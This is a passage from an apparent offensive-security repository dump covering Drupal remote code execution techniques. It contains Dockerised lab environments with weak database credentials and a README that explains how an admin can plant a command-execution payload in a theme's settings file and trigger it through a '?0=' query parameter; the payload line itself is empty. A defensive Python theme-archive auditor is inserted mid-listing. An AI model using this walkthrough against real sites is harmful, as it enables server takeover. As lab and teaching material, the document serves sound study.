53 | 54 | 55 | # Global configuration 56 | # 57 | 58 | # 59 | # ServerRoot: The top of the directory tree under which the server's 60 | # configuration, error, and log files are kept. 61 | # 62 | # NOTE! If you intend to place this on an NFS (or otherwise network) 63 | # mounted filesystem then please read the Mutex documentation (available 64 | # at ); 65 | # you will save yourself a lot of trouble. 66 | # 67 | # Do NOT add a slash at the end of the directory path. 68 | # 69 | #ServerRoot "/etc/apache2" 70 | 71 | # 72 | # The accept serialization lock file MUST BE STORED ON A LOCAL DISK. 73 | # 74 | #Mutex file:${APACHE_LOCK_DIR} default 75 | 76 | # 77 | # The directory where shm and other runtime files will be stored. 78 | # 79 | 80 | DefaultRuntimeDir ${APACHE_RUN_DIR} 81 | 82 | # 83 | # PidFile: The file in which the server should record its process 84 | # identification number when it starts. 85 | # This needs to be set in /etc/apache2/envvars 86 | # 87 | PidFile ${APACHE_PID_FILE} 88 | 89 | # 90 | # Timeout: The number of seconds before receives and sends time out. 91 | # 92 | Timeout 300 93 | 94 | # 95 | # KeepAlive: Whether or not to allow persistent connections (more than 96 | # one request per connection). Set to "Off" to deactivate. 97 | # 98 | KeepAlive On 99 | 100 | # 101 | # MaxKeepAliveRequests: The maximum number of requests to allow 102 | # during a persistent connection. Set to 0 to allow an unlimited amount. 103 | # We recommend you leave this number high, for maximum performance. 104 | # 105 | MaxKeepAliveRequests 100 106 | 107 | # 108 | # KeepAliveTimeout: Number of seconds to wait for the next request from the 109 | # same client on the same connection. 
110 | # 111 | KeepAliveTimeout 5 112 | 113 | 114 | # These need to be set in /etc/apache2/envvars 115 | User ${APACHE_RUN_USER} 116 | Group ${APACHE_RUN_GROUP} 117 | 118 | # 119 | # HostnameLookups: Log the names of clients or just their IP addresses 120 | # e.g., www.apache.org (on) or 204.62.129.132 (off). 121 | # The default is off because it'd be overall better for the net if people 122 | # had to knowingly turn this feature on, since enabling it means that 123 | # each client request will result in AT LEAST one lookup request to the 124 | # nameserver. 125 | # 126 | HostnameLookups Off 127 | 128 | # ErrorLog: The location of the error log file. 129 | # If you do not specify an ErrorLog directive within a 130 | # container, error messages relating to that virtual host will be 131 | # logged here. If you *do* define an error logfile for a 132 | # container, that host's errors will be logged there and not here. 133 | # 134 | ErrorLog ${APACHE_LOG_DIR}/error.log 135 | 136 | # 137 | # LogLevel: Control the severity of messages logged to the error_log. 138 | # Available values: trace8, ..., trace1, debug, info, notice, warn, 139 | # error, crit, alert, emerg. 140 | # It is also possible to configure the log level for particular modules, e.g. 141 | # "LogLevel info ssl:warn" 142 | # 143 | LogLevel warn 144 | 145 | # Include module configuration: 146 | IncludeOptional mods-enabled/*.load 147 | IncludeOptional mods-enabled/*.conf 148 | 149 | # Include list of ports to listen on 150 | Include ports.conf 151 | 152 | 153 | # Sets the default security model of the Apache2 HTTPD server. It does 154 | # not allow access to the root filesystem outside of /usr/share and /var/www. 155 | # The former is used by web applications packaged in Debian, 156 | # the latter may be used for local directories served by the web server. If 157 | # your system is serving content from a sub-directory in /srv you must allow 158 | # access here, or in any related virtual host. 
159 | AccessFileName .htaccess 160 | 161 | 162 | Options FollowSymLinks 163 | AllowOverride None 164 | Require all denied 165 | 166 | 167 | 168 | AllowOverride None 169 | Require all granted 170 | 171 | 172 | 173 | Options Indexes FollowSymLinks 174 | AllowOverride All 175 | Require all granted 176 | RewriteEngine on 177 | RewriteBase / 178 | RewriteCond %{REQUEST_FILENAME} !-f 179 | RewriteCond %{REQUEST_FILENAME} !-d 180 | RewriteRule ^(.*)$ index.php?q=$1 [L,QSA] 181 | 182 | 183 | # 184 | # Options Indexes FollowSymLinks 185 | # AllowOverride None 186 | # Require all granted 187 | # 188 | 189 | 190 | 191 | 192 | # AccessFileName: The name of the file to look for in each directory 193 | # for additional configuration directives. See also the AllowOverride 194 | # directive. 195 | # 196 | AccessFileName .htaccess 197 | 198 | # 199 | # The following lines prevent .htaccess and .htpasswd files from being 200 | # viewed by Web clients. 201 | # 202 | 203 | Require all denied 204 | 205 | 206 | 207 | # 208 | # The following directives define some format nicknames for use with 209 | # a CustomLog directive. 210 | # 211 | # These deviate from the Common Log Format definitions in that they use %O 212 | # (the actual bytes sent including headers) instead of %b (the size of the 213 | # requested file), because the latter makes it impossible to detect partial 214 | # requests. 215 | # 216 | # Note that the use of %{X-Forwarded-For}i instead of %h is not recommended. 217 | # Use mod_remoteip instead. 218 | # 219 | LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined 220 | LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined 221 | LogFormat "%h %l %u %t \"%r\" %>s %O" common 222 | LogFormat "%{Referer}i -> %U" referer 223 | LogFormat "%{User-agent}i" agent 224 | 225 | # Include of directories ignores editors' and dpkg's backup files, 226 | # see README.Debian for details. 

# Include generic snippets of statements
IncludeOptional conf-enabled/*.conf

# Include the virtual host configurations:
IncludeOptional sites-enabled/*.conf

# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Drupal/techniques/Services-module-unserialize-to-rce/test_env/files/services-7.x-3.18.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Drupal/techniques/Services-module-unserialize-to-rce/test_env/files/services-7.x-3.18.tar.gz
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-plugin/README.md:
--------------------------------------------------------------------------------
# Drupal - Upload a plugin

## Requirements

- A valid **username and password** of a user with **admin rights** on Drupal.

## Exploitation

## References
-
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-plugin/technique.json:
--------------------------------------------------------------------------------
{
  "name": "Drupal - Upload a plugin",
  "work_in_progress": false,
  "references": []
}
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-plugin/test_env/Dockerfile:
--------------------------------------------------------------------------------
FROM debian:buster

ENV DRUPALVERSION "9.2.1"

RUN apt-get -y -q update; \
    apt-get -y -q install apache2 xxd git unzip wget php php-simplexml php-gd php-ldap php-zip php-imap php-mysql php-mbstring mariadb-client mariadb-server composer

COPY ./files/apache2.conf /etc/apache2/apache2.conf
RUN a2enmod rewrite

RUN service mysql start;\
    mysql -u root -e "CREATE USER 'db'@'%' IDENTIFIED BY 'db'; UPDATE mysql.user set plugin = 'mysql_native_password' WHERE User = 'db'; GRANT ALL PRIVILEGES ON *.* TO 'db'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES;"

# && chaining: a failed download or unpack aborts the build rather than
# leaving a half-installed Drupal in the image.
# Note: the shell glob does not match dotfiles, so Drupal's own .htaccess stays
# behind; the clean-URL rewrite rules are set in files/apache2.conf instead.
RUN wget "https://ftp.drupal.org/files/projects/drupal-${DRUPALVERSION}.zip" -O /tmp/drupal.zip \
    && cd /var/www/html/ \
    && rm index.html \
    && unzip /tmp/drupal.zip \
    && mv drupal-${DRUPALVERSION}/* ./ \
    && composer install

RUN chown www-data: -R /var/www/

RUN echo "#!/bin/bash" > /entrypoint.sh ;\
    echo "service mysql start" >> /entrypoint.sh ;\
    echo "apachectl -D FOREGROUND" >> /entrypoint.sh ;\
    chmod +x /entrypoint.sh

EXPOSE 80

CMD /entrypoint.sh
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-plugin/test_env/Makefile:
-------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_drupal_upload_a_plugin 4 | 5 | all : build 6 | 7 | build: 8 | docker build -t $(IMGNAME):latest -f Dockerfile . 9 | 10 | start: build 11 | docker run --rm -it -p 10080:80 $(IMGNAME) 12 | 13 | background: 14 | docker run --rm -d -p 10080:80 $(IMGNAME) 15 | 16 | shell: 17 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 18 | 19 | stop: 20 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-plugin/test_env/files/apache2.conf: -------------------------------------------------------------------------------- 1 | # This is the main Apache server configuration file. It contains the 2 | # configuration directives that give the server its instructions. 3 | # See http://httpd.apache.org/docs/2.4/ for detailed information about 4 | # the directives and /usr/share/doc/apache2/README.Debian about Debian specific 5 | # hints. 6 | # 7 | # 8 | # Summary of how the Apache 2 configuration works in Debian: 9 | # The Apache 2 web server configuration in Debian is quite different to 10 | # upstream's suggested way to configure the web server. This is because Debian's 11 | # default Apache2 installation attempts to make adding and removing modules, 12 | # virtual hosts, and extra configuration directives as flexible as possible, in 13 | # order to make automating the changes and administering the server as easy as 14 | # possible. 
15 | 16 | # It is split into several files forming the configuration hierarchy outlined 17 | # below, all located in the /etc/apache2/ directory: 18 | # 19 | # /etc/apache2/ 20 | # |-- apache2.conf 21 | # | `-- ports.conf 22 | # |-- mods-enabled 23 | # | |-- *.load 24 | # | `-- *.conf 25 | # |-- conf-enabled 26 | # | `-- *.conf 27 | # `-- sites-enabled 28 | # `-- *.conf 29 | # 30 | # 31 | # * apache2.conf is the main configuration file (this file). It puts the pieces 32 | # together by including all remaining configuration files when starting up the 33 | # web server. 34 | # 35 | # * ports.conf is always included from the main configuration file. It is 36 | # supposed to determine listening ports for incoming connections which can be 37 | # customized anytime. 38 | # 39 | # * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/ 40 | # directories contain particular configuration snippets which manage modules, 41 | # global configuration fragments, or virtual host configurations, 42 | # respectively. 43 | # 44 | # They are activated by symlinking available configuration files from their 45 | # respective *-available/ counterparts. These should be managed by using our 46 | # helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See 47 | # their respective man pages for detailed information. 48 | # 49 | # * The binary is called apache2. Due to the use of environment variables, in 50 | # the default configuration, apache2 needs to be started/stopped with 51 | # /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not 52 | # work with the default configuration. 53 | 54 | 55 | # Global configuration 56 | # 57 | 58 | # 59 | # ServerRoot: The top of the directory tree under which the server's 60 | # configuration, error, and log files are kept. 61 | # 62 | # NOTE! 
If you intend to place this on an NFS (or otherwise network) 63 | # mounted filesystem then please read the Mutex documentation (available 64 | # at ); 65 | # you will save yourself a lot of trouble. 66 | # 67 | # Do NOT add a slash at the end of the directory path. 68 | # 69 | #ServerRoot "/etc/apache2" 70 | 71 | # 72 | # The accept serialization lock file MUST BE STORED ON A LOCAL DISK. 73 | # 74 | #Mutex file:${APACHE_LOCK_DIR} default 75 | 76 | # 77 | # The directory where shm and other runtime files will be stored. 78 | # 79 | 80 | DefaultRuntimeDir ${APACHE_RUN_DIR} 81 | 82 | # 83 | # PidFile: The file in which the server should record its process 84 | # identification number when it starts. 85 | # This needs to be set in /etc/apache2/envvars 86 | # 87 | PidFile ${APACHE_PID_FILE} 88 | 89 | # 90 | # Timeout: The number of seconds before receives and sends time out. 91 | # 92 | Timeout 300 93 | 94 | # 95 | # KeepAlive: Whether or not to allow persistent connections (more than 96 | # one request per connection). Set to "Off" to deactivate. 97 | # 98 | KeepAlive On 99 | 100 | # 101 | # MaxKeepAliveRequests: The maximum number of requests to allow 102 | # during a persistent connection. Set to 0 to allow an unlimited amount. 103 | # We recommend you leave this number high, for maximum performance. 104 | # 105 | MaxKeepAliveRequests 100 106 | 107 | # 108 | # KeepAliveTimeout: Number of seconds to wait for the next request from the 109 | # same client on the same connection. 110 | # 111 | KeepAliveTimeout 5 112 | 113 | 114 | # These need to be set in /etc/apache2/envvars 115 | User ${APACHE_RUN_USER} 116 | Group ${APACHE_RUN_GROUP} 117 | 118 | # 119 | # HostnameLookups: Log the names of clients or just their IP addresses 120 | # e.g., www.apache.org (on) or 204.62.129.132 (off). 
121 | # The default is off because it'd be overall better for the net if people 122 | # had to knowingly turn this feature on, since enabling it means that 123 | # each client request will result in AT LEAST one lookup request to the 124 | # nameserver. 125 | # 126 | HostnameLookups Off 127 | 128 | # ErrorLog: The location of the error log file. 129 | # If you do not specify an ErrorLog directive within a 130 | # container, error messages relating to that virtual host will be 131 | # logged here. If you *do* define an error logfile for a 132 | # container, that host's errors will be logged there and not here. 133 | # 134 | ErrorLog ${APACHE_LOG_DIR}/error.log 135 | 136 | # 137 | # LogLevel: Control the severity of messages logged to the error_log. 138 | # Available values: trace8, ..., trace1, debug, info, notice, warn, 139 | # error, crit, alert, emerg. 140 | # It is also possible to configure the log level for particular modules, e.g. 141 | # "LogLevel info ssl:warn" 142 | # 143 | LogLevel warn 144 | 145 | # Include module configuration: 146 | IncludeOptional mods-enabled/*.load 147 | IncludeOptional mods-enabled/*.conf 148 | 149 | # Include list of ports to listen on 150 | Include ports.conf 151 | 152 | 153 | # Sets the default security model of the Apache2 HTTPD server. It does 154 | # not allow access to the root filesystem outside of /usr/share and /var/www. 155 | # The former is used by web applications packaged in Debian, 156 | # the latter may be used for local directories served by the web server. If 157 | # your system is serving content from a sub-directory in /srv you must allow 158 | # access here, or in any related virtual host. 
159 | AccessFileName .htaccess 160 | 161 | 162 | Options FollowSymLinks 163 | AllowOverride None 164 | Require all denied 165 | 166 | 167 | 168 | AllowOverride None 169 | Require all granted 170 | 171 | 172 | 173 | Options Indexes FollowSymLinks 174 | AllowOverride All 175 | Require all granted 176 | RewriteEngine on 177 | RewriteBase / 178 | RewriteCond %{REQUEST_FILENAME} !-f 179 | RewriteCond %{REQUEST_FILENAME} !-d 180 | RewriteRule ^(.*)$ index.php?q=$1 [L,QSA] 181 | 182 | 183 | # 184 | # Options Indexes FollowSymLinks 185 | # AllowOverride None 186 | # Require all granted 187 | # 188 | 189 | 190 | 191 | 192 | # AccessFileName: The name of the file to look for in each directory 193 | # for additional configuration directives. See also the AllowOverride 194 | # directive. 195 | # 196 | AccessFileName .htaccess 197 | 198 | # 199 | # The following lines prevent .htaccess and .htpasswd files from being 200 | # viewed by Web clients. 201 | # 202 | 203 | Require all denied 204 | 205 | 206 | 207 | # 208 | # The following directives define some format nicknames for use with 209 | # a CustomLog directive. 210 | # 211 | # These deviate from the Common Log Format definitions in that they use %O 212 | # (the actual bytes sent including headers) instead of %b (the size of the 213 | # requested file), because the latter makes it impossible to detect partial 214 | # requests. 215 | # 216 | # Note that the use of %{X-Forwarded-For}i instead of %h is not recommended. 217 | # Use mod_remoteip instead. 218 | # 219 | LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined 220 | LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined 221 | LogFormat "%h %l %u %t \"%r\" %>s %O" common 222 | LogFormat "%{Referer}i -> %U" referer 223 | LogFormat "%{User-agent}i" agent 224 | 225 | # Include of directories ignores editors' and dpkg's backup files, 226 | # see README.Debian for details. 

# Include generic snippets of statements
IncludeOptional conf-enabled/*.conf

# Include the virtual host configurations:
IncludeOptional sites-enabled/*.conf

# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/README.md:
--------------------------------------------------------------------------------
# Drupal - Upload a theme

## Requirements

- A valid **username and password** of a user with **admin rights** on Drupal.

## Exploitation

Drupal restricts direct access to files and folders, so we have to inject our RCE payload into a theme-specific file that the CMS loads dynamically.

## Creating the theme archive

Visit the themes section on the Drupal website [here](https://www.drupal.org/project/project_theme) and download a theme zip file. We'll use the [Zen](https://www.drupal.org/project/zen/releases/8.x-7.0-alpha15) theme for this example.

After extracting the zip file, find the `theme-settings.php` file, replace its contents with the RCE payload, and recreate the zip file of the theme folder:

```sh
wget https://ftp.drupal.org/files/projects/zen-8.x-7.0-alpha15.zip
unzip zen-8.x-7.0-alpha15.zip
echo '' > zen/theme-settings.php
zip -9 -r zen.zip zen/
```

## Accessing the dashboard and installing the theme

Log in as a user with administrative rights on the Drupal site at [http://TARGET/user/login](http://TARGET/user/login)

![](images/README/2022-06-27-04-46-36.png)

Select "Appearance" from the side menu and click "+Add new theme" on the next page, which should load the following page:

![](images/README/2022-06-27-05-04-26.png)

Select the modified theme zip file and click "Continue". If the files are uploaded, a message similar to the one below should be displayed:

![](images/README/2022-06-27-05-09-03.png)

Go back to the "Appearance" page and find the newly uploaded theme listed under the "Uninstalled themes" section. Click the "install" button under the theme name, and the theme should now appear under the "Installed themes" section:

![](images/README/2022-06-27-05-11-55.png)

Click the theme's "settings" option, which loads the settings page together with the injected RCE payload. With the payload injected in our case, adding the GET parameter `?0=id` returns the command's output:

![](images/README/2022-06-27-05-14-58.png)

## References
- https://www.drupal.org/project/zen
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/images/README/2022-06-27-04-46-36.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/images/README/2022-06-27-04-46-36.png
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/images/README/2022-06-27-05-04-26.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/images/README/2022-06-27-05-04-26.png
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/images/README/2022-06-27-05-09-03.png:
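Defender-side counterpart to the theme-upload procedure in the Upload-a-theme README above, as an added example that is not code from the Awesome-RCE-techniques repository: it compares an admin-uploaded theme archive with the official release archive of the same theme (the Zen zip the write-up fetches from ftp.drupal.org), reports added, removed and modified members, and flags changed PHP files that read request superglobals, which a theme's settings file has no reason to do. Both archives are constructed in memory; the file names and contents are placeholder stand-ins, not the real Zen release.

```python
from __future__ import annotations

import hashlib
import io
import re
import zipfile

PHP_EXT = (".php", ".inc", ".module", ".theme")
# A theme's settings file has no reason to read raw request input, so a
# request superglobal in an added or changed PHP member is a tamper indicator.
SUPERGLOBAL = re.compile(rb"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b")


def member_digests(data: bytes) -> dict[str, str]:
    """Map every regular file in a zip archive to the SHA-256 of its contents."""
    digests: dict[str, str] = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.is_dir():
                digests[info.filename] = hashlib.sha256(zf.read(info)).hexdigest()
    return digests


def php_reads_request(data: bytes, name: str) -> bool:
    """True if the named member is PHP code that references a request superglobal."""
    if not name.lower().endswith(PHP_EXT):
        return False
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return SUPERGLOBAL.search(zf.read(name)) is not None


def audit_theme(reference: bytes, uploaded: bytes) -> dict[str, list[str]]:
    """Diff an uploaded theme zip against the upstream release archive.

    Returns the members that were added, removed or modified relative to the
    release, plus the added/modified PHP members that read request input.
    """
    ref, up = member_digests(reference), member_digests(uploaded)
    added = sorted(set(up) - set(ref))
    removed = sorted(set(ref) - set(up))
    modified = sorted(n for n in set(ref) & set(up) if ref[n] != up[n])
    flagged = sorted(n for n in added + modified if php_reads_request(uploaded, n))
    return {"added": added, "removed": removed, "modified": modified, "flagged": flagged}


def build_zip(members: dict[str, bytes]) -> bytes:
    """Build an in-memory zip from a {path: content} mapping (fixture helper)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed stand-in for the official Zen release (not the real archive):
# the layout mirrors a Drupal theme, the contents are placeholders.
UPSTREAM_FILES = {
    "zen/zen.info.yml": b"name: Zen\ntype: theme\ncore_version_requirement: ^8 || ^9\n",
    "zen/theme-settings.php": (
        b"<?php\n\n"
        b"function zen_form_system_theme_settings_alter(&$form, $form_state) {\n"
        b"  // constructed placeholder for the upstream settings form\n}\n"
    ),
    "zen/zen.theme": b"<?php\n// constructed placeholder\n",
}
REFERENCE_ZIP = build_zip(UPSTREAM_FILES)

# Constructed tampered upload: theme-settings.php overwritten (as in the
# write-up's zip step) and one unrelated file added.  The replacement only
# reads a request parameter; it is a detection fixture, not a payload.
TAMPERED = dict(UPSTREAM_FILES)
TAMPERED["zen/theme-settings.php"] = b"<?php\n// constructed tampered file\n$param = $_GET[0];\n"
TAMPERED["zen/extra.php"] = b"<?php\n// constructed added file without request handling\n"
UPLOADED_ZIP = build_zip(TAMPERED)

if __name__ == "__main__":
    for key, names in audit_theme(REFERENCE_ZIP, UPLOADED_ZIP).items():
        print(f"{key:9s}: {names}")
```

In practice the reference archive is the release zip fetched from ftp.drupal.org and the uploaded one is taken from the webserver's temporary upload directory or the installed theme folder before it is enabled.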
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/images/README/2022-06-27-05-09-03.png
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/images/README/2022-06-27-05-11-55.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/images/README/2022-06-27-05-11-55.png
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/images/README/2022-06-27-05-14-58.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/images/README/2022-06-27-05-14-58.png
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/technique.json:
--------------------------------------------------------------------------------
{
  "name": "Drupal - Upload a theme",
  "work_in_progress": false,
  "references": [
    "https://www.drupal.org/project/zen"
  ]
}
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/test_env/Dockerfile:
--------------------------------------------------------------------------------
FROM debian:buster

ENV DRUPALVERSION "9.4.1"

RUN apt-get -y -q update; \
    apt-get -y -q install apache2 xxd git unzip wget php php-simplexml php-gd php-ldap php-zip php-imap php-mysql php-mbstring mariadb-client mariadb-server composer

COPY ./files/apache2.conf /etc/apache2/apache2.conf
RUN a2enmod rewrite

RUN service mysql start;\
    mysql -u root -e "CREATE USER 'db'@'%' IDENTIFIED BY 'db'; UPDATE mysql.user set plugin = 'mysql_native_password' WHERE User = 'db'; GRANT ALL PRIVILEGES ON *.* TO 'db'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES;"

# && chaining: a failed download or unpack aborts the build rather than
# leaving a half-installed Drupal in the image.
# Note: the shell glob does not match dotfiles, so Drupal's own .htaccess stays
# behind; the clean-URL rewrite rules are set in files/apache2.conf instead.
RUN wget "https://ftp.drupal.org/files/projects/drupal-${DRUPALVERSION}.zip" -O /tmp/drupal.zip \
    && cd /var/www/html/ \
    && rm index.html \
    && unzip /tmp/drupal.zip \
    && mv drupal-${DRUPALVERSION}/* ./ \
    && rm -rf vendor/ \
    && composer install

RUN chown www-data: -R /var/www/

RUN echo "#!/bin/bash" > /entrypoint.sh ;\
    echo "service mysql start" >> /entrypoint.sh ;\
    echo "apachectl -D FOREGROUND" >> /entrypoint.sh ;\
    chmod +x /entrypoint.sh

EXPOSE 80

CMD /entrypoint.sh
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/test_env/Makefile:
--------------------------------------------------------------------------------
.PHONY: all build start background shell stop

# Image tag unique to this technique: sharing one tag across the Drupal test
# environments makes `make build` overwrite another technique's image and
# `make stop` stop the wrong container.
IMGNAME := awesome_rce_drupal_upload_a_theme

all : build

build:
	docker build -t $(IMGNAME):latest -f Dockerfile .

start: build
	docker run --rm -it -p 10080:80 $(IMGNAME)

background:
	docker run --rm -d -p 10080:80 $(IMGNAME)

shell:
	docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash

stop:
	docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}')
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/test_env/files/apache2.conf:
--------------------------------------------------------------------------------
# This is the main Apache server configuration file. It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.4/ for detailed information about
# the directives and /usr/share/doc/apache2/README.Debian about Debian specific
# hints.
#
#
# Summary of how the Apache 2 configuration works in Debian:
# The Apache 2 web server configuration in Debian is quite different to
# upstream's suggested way to configure the web server. This is because Debian's
# default Apache2 installation attempts to make adding and removing modules,
# virtual hosts, and extra configuration directives as flexible as possible, in
# order to make automating the changes and administering the server as easy as
# possible.

# It is split into several files forming the configuration hierarchy outlined
# below, all located in the /etc/apache2/ directory:
#
#   /etc/apache2/
#   |-- apache2.conf
#   |   `--  ports.conf
#   |-- mods-enabled
#   |   |-- *.load
#   |   `-- *.conf
#   |-- conf-enabled
#   |   `-- *.conf
#   `-- sites-enabled
#       `-- *.conf
#
#
# * apache2.conf is the main configuration file (this file).
It puts the pieces 32 | # together by including all remaining configuration files when starting up the 33 | # web server. 34 | # 35 | # * ports.conf is always included from the main configuration file. It is 36 | # supposed to determine listening ports for incoming connections which can be 37 | # customized anytime. 38 | # 39 | # * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/ 40 | # directories contain particular configuration snippets which manage modules, 41 | # global configuration fragments, or virtual host configurations, 42 | # respectively. 43 | # 44 | # They are activated by symlinking available configuration files from their 45 | # respective *-available/ counterparts. These should be managed by using our 46 | # helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See 47 | # their respective man pages for detailed information. 48 | # 49 | # * The binary is called apache2. Due to the use of environment variables, in 50 | # the default configuration, apache2 needs to be started/stopped with 51 | # /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not 52 | # work with the default configuration. 53 | 54 | 55 | # Global configuration 56 | # 57 | 58 | # 59 | # ServerRoot: The top of the directory tree under which the server's 60 | # configuration, error, and log files are kept. 61 | # 62 | # NOTE! If you intend to place this on an NFS (or otherwise network) 63 | # mounted filesystem then please read the Mutex documentation (available 64 | # at ); 65 | # you will save yourself a lot of trouble. 66 | # 67 | # Do NOT add a slash at the end of the directory path. 68 | # 69 | #ServerRoot "/etc/apache2" 70 | 71 | # 72 | # The accept serialization lock file MUST BE STORED ON A LOCAL DISK. 73 | # 74 | #Mutex file:${APACHE_LOCK_DIR} default 75 | 76 | # 77 | # The directory where shm and other runtime files will be stored. 
78 | # 79 | 80 | DefaultRuntimeDir ${APACHE_RUN_DIR} 81 | 82 | # 83 | # PidFile: The file in which the server should record its process 84 | # identification number when it starts. 85 | # This needs to be set in /etc/apache2/envvars 86 | # 87 | PidFile ${APACHE_PID_FILE} 88 | 89 | # 90 | # Timeout: The number of seconds before receives and sends time out. 91 | # 92 | Timeout 300 93 | 94 | # 95 | # KeepAlive: Whether or not to allow persistent connections (more than 96 | # one request per connection). Set to "Off" to deactivate. 97 | # 98 | KeepAlive On 99 | 100 | # 101 | # MaxKeepAliveRequests: The maximum number of requests to allow 102 | # during a persistent connection. Set to 0 to allow an unlimited amount. 103 | # We recommend you leave this number high, for maximum performance. 104 | # 105 | MaxKeepAliveRequests 100 106 | 107 | # 108 | # KeepAliveTimeout: Number of seconds to wait for the next request from the 109 | # same client on the same connection. 110 | # 111 | KeepAliveTimeout 5 112 | 113 | 114 | # These need to be set in /etc/apache2/envvars 115 | User ${APACHE_RUN_USER} 116 | Group ${APACHE_RUN_GROUP} 117 | 118 | # 119 | # HostnameLookups: Log the names of clients or just their IP addresses 120 | # e.g., www.apache.org (on) or 204.62.129.132 (off). 121 | # The default is off because it'd be overall better for the net if people 122 | # had to knowingly turn this feature on, since enabling it means that 123 | # each client request will result in AT LEAST one lookup request to the 124 | # nameserver. 125 | # 126 | HostnameLookups Off 127 | 128 | # ErrorLog: The location of the error log file. 129 | # If you do not specify an ErrorLog directive within a 130 | # container, error messages relating to that virtual host will be 131 | # logged here. If you *do* define an error logfile for a 132 | # container, that host's errors will be logged there and not here. 
133 | # 134 | ErrorLog ${APACHE_LOG_DIR}/error.log 135 | 136 | # 137 | # LogLevel: Control the severity of messages logged to the error_log. 138 | # Available values: trace8, ..., trace1, debug, info, notice, warn, 139 | # error, crit, alert, emerg. 140 | # It is also possible to configure the log level for particular modules, e.g. 141 | # "LogLevel info ssl:warn" 142 | # 143 | LogLevel warn 144 | 145 | # Include module configuration: 146 | IncludeOptional mods-enabled/*.load 147 | IncludeOptional mods-enabled/*.conf 148 | 149 | # Include list of ports to listen on 150 | Include ports.conf 151 | 152 | 153 | # Sets the default security model of the Apache2 HTTPD server. It does 154 | # not allow access to the root filesystem outside of /usr/share and /var/www. 155 | # The former is used by web applications packaged in Debian, 156 | # the latter may be used for local directories served by the web server. If 157 | # your system is serving content from a sub-directory in /srv you must allow 158 | # access here, or in any related virtual host. 159 | AccessFileName .htaccess 160 | 161 | 162 | Options FollowSymLinks 163 | AllowOverride None 164 | Require all denied 165 | 166 | 167 | 